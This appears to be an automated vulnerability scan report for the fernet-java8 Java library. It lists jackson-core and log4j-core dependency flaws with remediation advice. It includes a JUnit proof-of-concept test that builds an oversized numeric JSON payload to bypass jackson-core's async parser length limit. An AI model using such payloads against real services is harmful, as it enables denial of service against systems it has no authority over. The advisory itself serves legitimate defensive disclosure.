Vulnerabilities |
6 via 22 paths |
|---|---|
Dependencies |
38 |
Source |
GitHub |
Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-core
- Introduced through: com.fasterxml.jackson.core:jackson-core@2.18.3, com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.18.3 and others
Detailed paths
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.fasterxml.jackson.core:jackson-core@2.18.3Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.18.6.
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3Remediation: Upgrade to com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.18.6.
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.18.3 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3Remediation: Upgrade to com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.18.6.
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-kms@1.12.797 › com.amazonaws:aws-java-sdk-core@1.12.797 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-secretsmanager@1.12.797 › com.amazonaws:aws-java-sdk-core@1.12.797 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-kms@1.12.797 › com.amazonaws:jmespath-java@1.12.797 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-secretsmanager@1.12.797 › com.amazonaws:jmespath-java@1.12.797 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-kms@1.12.797 › com.amazonaws:aws-java-sdk-core@1.12.797 › com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.18.3 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-secretsmanager@1.12.797 › com.amazonaws:aws-java-sdk-core@1.12.797 › com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.18.3 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
Overview
com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in which the non-blocking async JSON parser can be made to bypass the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. An attacker can cause excessive memory allocation and CPU exhaustion by submitting JSON documents containing extremely long numeric values through the asynchronous parser interface.
PoC
The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.
package tools.jackson.core.unittest.dos;
import java.nio.charset.StandardCharsets;
import org.junit.jupiter.api.Test;
import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;
import static org.junit.jupiter.api.Assertions.*;
/**
* POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
*
* Authors: sprabhav7, rohan-repos
*
* maxNumberLength default = 1000 characters (digits).
* A number with more than 1000 digits should be rejected by any parser.
*
* BUG: The async parser never calls resetInt()/resetFloat() which is where
* validateIntegerLength()/validateFPLength() lives. Instead it calls
* _valueComplete() which skips all number length validation.
*
* CWE-770: Allocation of Resources Without Limits or Throttling
*/
class AsyncParserNumberLengthBypassTest {
private static final int MAX_NUMBER_LENGTH = 1000;
private static final int TEST_NUMBER_LENGTH = 5000;
private final JsonFactory factory = new JsonFactory();
// CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
@Test
void syncParserRejectsLongNumber() throws Exception {
byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
// Output to console
System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
try {
try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
while (p.nextToken() != null) {
if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
}
}
}
fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
} catch (StreamConstraintsException e) {
System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
}
}
// VULNERABILITY: Async parser accepts the SAME number that sync rejects
@Test
void asyncParserAcceptsLongNumber() throws Exception {
byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
NonBlockingByteArrayJsonParser p =
(NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
p.feedInput(payload, 0, payload.length);
p.endOfInput();
boolean foundNumber = false;
try {
while (p.nextToken() != null) {
if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
foundNumber = true;
String numberText = p.getText();
assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
"Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
}
}
// Output to console
System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
} catch (StreamConstraintsException e) {
fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
}
p.close();
}
private byte[] buildPayloadWithLongInteger(int numDigits) {
StringBuilder sb = new StringBuilder(numDigits + 10);
sb.append("{\"v\":");
for (int i = 0; i < numDigits; i++) {
sb.append((char) ('1' + (i % 9)));
}
sb.append('}');
return sb.toString().getBytes(StandardCharsets.UTF_8);
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.6, 2.21.1 or higher.
References
high severity
new
- Vulnerable module: com.fasterxml.jackson.core:jackson-core
- Introduced through: com.fasterxml.jackson.core:jackson-core@2.18.3, com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.18.3 and others
Detailed paths
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.fasterxml.jackson.core:jackson-core@2.18.3Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.18.7.
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3Remediation: Upgrade to com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.18.7.
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.18.3 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3Remediation: Upgrade to com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.18.7.
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-kms@1.12.797 › com.amazonaws:aws-java-sdk-core@1.12.797 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-secretsmanager@1.12.797 › com.amazonaws:aws-java-sdk-core@1.12.797 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-kms@1.12.797 › com.amazonaws:jmespath-java@1.12.797 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-secretsmanager@1.12.797 › com.amazonaws:jmespath-java@1.12.797 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-kms@1.12.797 › com.amazonaws:aws-java-sdk-core@1.12.797 › com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.18.3 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-java-sdk-secretsmanager@1.12.797 › com.amazonaws:aws-java-sdk-core@1.12.797 › com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.18.3 › com.fasterxml.jackson.core:jackson-databind@2.18.3 › com.fasterxml.jackson.core:jackson-core@2.18.3
Overview
com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the enforcement of document length constraints in blocking, async, and DataInput parser processes. An attacker can cause excessive resource consumption by submitting oversized JSON documents that bypass configured size limits.
Remediation
Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.7, 2.21.2 or higher.
References
high severity
new
- Vulnerable module: org.apache.logging.log4j:log4j-core
- Introduced through: com.amazonaws:aws-lambda-java-log4j2@1.6.0
Detailed paths
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-lambda-java-log4j2@1.6.0 › org.apache.logging.log4j:log4j-core@2.17.1
Overview
org.apache.logging.log4j:log4j-core is a logging library for Java.
Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output in the XmlLayout plugin. An attacker can cause log events to be silently lost or malformed by injecting XML 1.0 forbidden characters into log messages or MDC values. This may result in malformed XML output, which can cause downstream log-processing systems to drop affected records or prevent log events from being delivered to their intended destinations.
Remediation
A fix was pushed into the master branch but not yet published.
References
medium severity
new
- Vulnerable module: org.apache.logging.log4j:log4j-core
- Introduced through: com.amazonaws:aws-lambda-java-log4j2@1.6.0
Detailed paths
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-lambda-java-log4j2@1.6.0 › org.apache.logging.log4j:log4j-core@2.17.1
Overview
org.apache.logging.log4j:log4j-core is a logging library for Java.
Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output in the Log4j1XmlLayout plugin. An attacker can cause log events to be silently lost or downstream log processing systems to drop or fail to index affected records by introducing XML 1.0 forbidden characters into log messages, resulting in malformed XML output that conforming XML parsers reject with a fatal error.
Remediation
A fix was pushed into the master branch but not yet published.
References
medium severity
- Vulnerable module: org.apache.logging.log4j:log4j-core
- Introduced through: com.amazonaws:aws-lambda-java-log4j2@1.6.0
Detailed paths
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-lambda-java-log4j2@1.6.0 › org.apache.logging.log4j:log4j-core@2.17.1Remediation: Upgrade to com.amazonaws:aws-lambda-java-log4j2@1.6.2.
Overview
org.apache.logging.log4j:log4j-core is a logging library for Java.
Affected versions of this package are vulnerable to Improper Validation of Certificate with Host Mismatch due to the lack of TLS hostname verification in the SocketAppender component. An attacker can intercept or redirect log traffic by performing a man-in-the-middle attack if they are able to intercept or redirect network traffic between the client and the log receiver and can present a server certificate issued by a certification authority trusted by the configured trust store or the default Java trust store.
Workaround
This vulnerability can be mitigated by configuring the SocketAppender to use a private or restricted trust root to limit the set of trusted certificates.
Remediation
Upgrade org.apache.logging.log4j:log4j-core to version 2.25.3 or higher.
References
medium severity
new
- Vulnerable module: org.apache.logging.log4j:log4j-core
- Introduced through: com.amazonaws:aws-lambda-java-log4j2@1.6.0
Detailed paths
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-lambda-java-log4j2@1.6.0 › org.apache.logging.log4j:log4j-core@2.17.1
Overview
org.apache.logging.log4j:log4j-core is a logging library for Java.
Affected versions of this package are vulnerable to Improper Validation of Certificate with Host Mismatch due to the lack of TLS hostname verification in the SocketAppender component when configured through the verifyHostName attribute of the <Ssl> element. An attacker can intercept and manipulate network traffic by presenting a certificate issued by a trusted certificate authority to the appender's configured trust store, or the default Java trust store if none is configured. This is only exploitable if an SMTP, Socket, or Syslog appender is in use and TLS is configured via a nested
Note:
This issue is due to incomplete fix for CVE-2025-68161.
Remediation
A fix was pushed into the master branch but not yet published.
References
medium severity
new
- Module: junit:junit
- Introduced through: com.amazonaws:aws-lambda-java-log4j2@1.6.0
Detailed paths
-
Introduced through: l0s/fernet-java8@l0s/fernet-java8 › com.amazonaws:aws-lambda-java-log4j2@1.6.0 › org.apache.logging.log4j:log4j-core@2.17.1 › org.junit.vintage:junit-vintage-engine@5.7.2 › junit:junit@4.13.2
EPL-1.0 license